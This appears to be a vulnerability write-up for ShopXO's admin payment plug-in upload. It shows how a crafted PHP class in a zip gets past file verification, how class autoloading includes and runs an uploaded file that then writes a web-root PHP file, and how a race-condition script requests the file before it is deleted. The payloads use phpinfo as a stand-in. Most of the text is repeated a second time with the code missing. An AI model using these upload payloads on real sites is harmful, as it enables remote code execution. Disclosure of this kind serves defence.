When uploading payment plug-ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload
In the Upload method in the application\service\PaymentService.php file, the file_put_contents function parameter is controllable
But later call GetPaymentConfig method to do file verification, if the file verification is not passed, the file will be deleted
In the GetPaymentConfig method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class
According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows:
<?php
namespace payment;
class a{
public function __construct($params = [])
{
phpinfo();
}
public function Config()
{
}
public function Pay()
{
}
public function Respond()
{
}
}
$b=new a();
?>
Finally, the method is called in application\admin\controller\Payment.php
After logging in to the background, upload the zip package containing a.php at the site management -> payment method -> upload
Visit extend/payment/a.php
Not by constructing code:
The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in /thinkphp/library/think/Loader.php
findFile is the function of thinkphp to find files. It is mainly loaded through psr-4 and classmap. The fully qualified name of the class we passed in is returned by the findFile function and finally spliced into the complete file path.
Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation
At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed.
Upload the zip archive containing the php file at the same location, the code content is:
<?php $f = '1.php'; $shell = '<?php phpinfo(); ?>'; file_put_contents($f,$shell); ?>
Although the upload failed message is returned after uploading, the code has been included and executed
The file is created in 1.php under the root directory of shopxo installation, visit 1.php
There are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access.
I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing
The Python script is as follows:
import requests
url='http://url/extend/payment/2.php'
while True:
s=requests.get(url)
if 'phpinfo' in s.text:
print(s.text)
exit()
Upload the php file in the compressed package as follows:
When uploading payment plug-ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload In the Upload method in the application\service\PaymentService.php file, the file_put_contents function parameter is controllable
But later call GetPaymentConfig method to do file verification, if the file verification is not passed, the file will be deleted
In the GetPaymentConfig method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class
According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows:
Finally, the method is called in application\admin\controller\Payment.php
After logging in to the background, upload the zip package containing a.php at the site management -> payment method -> upload
Visit extend/payment/a.php
Not by constructing code: The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in /thinkphp/library/think/Loader.php
findFile is the function of thinkphp to find files. It is mainly loaded through psr-4 and classmap. The fully qualified name of the class we passed in is returned by the findFile function and finally spliced into the complete file path.
Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation
At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed.
Upload the zip archive containing the php file at the same location, the code content is:
<?php $f = '1.php'; $shell = '<?php phpinfo(); ?>'; file_put_contents($f,$shell); ?>Although the upload failed message is returned after uploading, the code has been included and executed The file is created in 1.php under the root directory of shopxo installation, visit 1.phpThere are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access. I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing
The Python script is as follows:
Upload the php file in the compressed package as follows:
The generated php file is in the extend\payment directory Visit extend\payment\1.php